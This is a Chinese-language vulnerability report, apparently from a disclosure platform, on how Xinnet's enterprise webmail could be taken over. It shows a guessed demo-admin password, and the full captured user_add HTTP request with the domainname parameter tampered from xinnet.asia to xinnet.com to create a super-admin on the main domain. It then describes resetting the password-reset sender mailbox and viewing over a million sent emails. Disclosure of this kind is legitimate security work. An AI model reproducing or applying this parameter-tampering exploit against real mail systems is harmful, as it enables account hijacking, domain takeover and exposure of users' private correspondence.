新网某漏洞可导致劫持任意域名

在测一个漏洞，由于数据有点多所以读取得慢。

于是顺手打开了新网的邮箱登陆界面

http://webmail.xinnet.com

右上角有个“【重要通知】系统升级后点击查看注意事项”

顺手点了，看看能不能有什么打码不注意的地方

找一圈发现没啥

但是有一段是介绍企业邮箱超管功能的

截图显示演示账户是[email protected]

来到http://webmail.xinnet.asia/

尝试登录[email protected]

第一次就试出密码是xinnet123



确实是管理员账号

进入管理员界面

http://webmail.xinnet.asia/app/eadmin/msetnav



这里发现了一个功能：添加用户。由于企业邮箱设计的特性，这个功能我会很注意。之前也看过其他的邮件系统都不存在问题。但是新网，跪了。

添加用户，把“企业管理员”的选框打钩

提交，抓包

code 区域

POST /app/eadmin/user/user_add HTTP/1.1

Host: webmail.xinnet.com

Proxy-Connection: keep-alive

Content-Length: 615

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://webmail.xinnet.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36

Content-Type: application/x-www-form-urlencoded

DNT: 1

Referer: http://webmail.xinnet.com/app/eadmin/user/user_preadd?method=preAddUser&domainname=xinnet.asia&orgId=

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4

Cookie: ***mask***



usernameLast=wooyun&usernameFirst=wooyun&userid=wooyun&domainname=xinnet.asia&adminPermission=1&corporganizationname=%E6%96%B0%E7%BD%91%E4%BA%91%E9%82%AE%E6%B5%8B%E8%AF%95&corporganizationiid=&oldcorporganizationiid=&newPassword=*******&mailforever=1&homeemailaddress=&homewebpage=&msn=&qq=&mobilephone=&otherphone=&companyname=&officestreet=&officepostalcode=&duty=&workphone=&workfaxnumber=&workemailaddress=&businesswebpage=&selectmail=1&userquota=365&pop=1&imap=1&stmp=1&webmail=1&maxrcptnum=50&maxmessagesize=50&maxattachsize=50&selectfilemanage=1&networkspace=50&filemanageforever=1&userAliases=&ipaddress=

这里很关键，把domainname=xinnet.asia改成xinnet.com

提示添加成功，

来到http://webmail.xinnet.com尝试登录

擦咧，成功了。

可以看到，确实是超管权限。

进入管理页面

这之间我在新网注册了账号，并模拟密码找回流程

发现最后给我们发新密码的是：[email protected]



来重置这个邮箱的密码

重置为Wooyun9080@



登录邮箱，看“已发送”

每页10封邮件，共137429页，也就是上百万封邮件。



现在在加载中，我的Chrome已经开始卡顿了。。。。。

电脑配置低，网络差。没办法完整看到列表了。。。

下图证明这个邮箱确实是发送密码的